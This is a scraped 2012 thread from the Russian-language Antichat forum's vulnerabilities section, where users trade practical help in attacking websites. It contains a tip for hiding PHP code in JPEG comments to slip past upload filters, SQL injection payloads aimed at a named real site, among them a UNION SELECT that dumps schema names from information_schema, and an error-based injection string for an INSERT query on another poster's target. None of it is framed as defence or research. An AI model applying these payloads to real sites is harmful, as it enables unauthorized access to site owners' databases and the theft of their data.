HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19631  
Старый 16.02.2012, 06:55
Юго
Guest
Сообщений: n/a
Провел на форуме:
13201

Репутация: 17
По умолчанию

Цитата:
Сообщение от Киев  
Киев said:
Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
 
Ответить с цитированием

  #19632  
Старый 16.02.2012, 06:58
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Юго  
Юго said:
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
полюбому нужно чтоб сервер обрабатывал jpeg как php сценарии, чтоб код в exif исполнялся
 
Ответить с цитированием

  #19633  
Старый 16.02.2012, 11:26
ReV0LVeR
Guest
Сообщений: n/a
Провел на форуме:
11980

Репутация: 1
По умолчанию

http://www.artplast-100.ru/news/22/

http://www.artplast-100.ru/news/22-2/

как быть в таком случае?

http://www.artplast-100.ru/news/22 or 1=1/

http://www.artplast-100.ru/news/22/**/or/**/1=1/*/

и т д.
 
Ответить с цитированием

  #19634  
Старый 16.02.2012, 13:50
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от ReV0LVeR  
ReV0LVeR said:
http://www.artplast-100.ru/news/22/
http://www.artplast-100.ru/news/22-2/
как быть в таком случае?
http://www.artplast-100.ru/news/22 or 1=1/
http://www.artplast-100.ru/news/22/**/or/**/1=1/*/
и т д.
http://www.artplast-100.ru/news/(-22)union(select(1),(select(group_concat(schema_nam e))from(information_schema.schemata)),3,4,5,6)/

но все данные могут не влезть

подробный ман
 
Ответить с цитированием

  #19635  
Старый 16.02.2012, 15:58
Revi
Guest
Сообщений: n/a
Провел на форуме:
13446

Репутация: 0
По умолчанию

Добрый день

Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1

Вот так можно ли это раскрутить и как за ранее спс!
 
Ответить с цитированием

  #19636  
Старый 16.02.2012, 16:22
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от Revi  
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\

Код:
Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'
 
Ответить с цитированием

  #19637  
Старый 16.02.2012, 16:25
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от Revi  
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
Это оч просто и всего лишь 2 варианта:

1. простой - короткий и понятный ман

2. сложный - использование программ для автоматической раскрутки скулей.

Цитата:
Сообщение от Ereee  
Ereee said:
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\
Код:
Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'
Д ты хрен угадаешь что у него там )
 
Ответить с цитированием

  #19638  
Старый 16.02.2012, 18:14
TYPUCT
Guest
Сообщений: n/a
Провел на форуме:
9412

Репутация: 0
По умолчанию

Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит?

Data Base: J.I~?rl21m)" x~^xk[rr?xWP}S(

Length of 'Data Base' is 17

Data Base: Z.F?`W!e?no]2f3kx

Length of 'Data Base' is 48

Data Base: Gf1?z@D??A&> ]{ijE&??;xLx?oZ/V?5QzRkq3
 
Ответить с цитированием

  #19639  
Старый 16.02.2012, 18:38
Revi
Guest
Сообщений: n/a
Провел на форуме:
13446

Репутация: 0
По умолчанию

мм

Цитата:
Сообщение от Revi  
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
делал по манулу /thread43966.html

выбивает ошибку

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6 --', 'ип', 'ваываыв', '2012-02-16 16:34:05',' at line 1
 
Ответить с цитированием

  #19640  
Старый 16.02.2012, 19:09
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

TYPUCT, потому что руками надо делать

кодировка

Revi, ты уверен что там 6?

да и не в этом суть.

экстрасенсы не знают что делать

может пруф уже скинешь, нет?

так вряд ли помогут
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ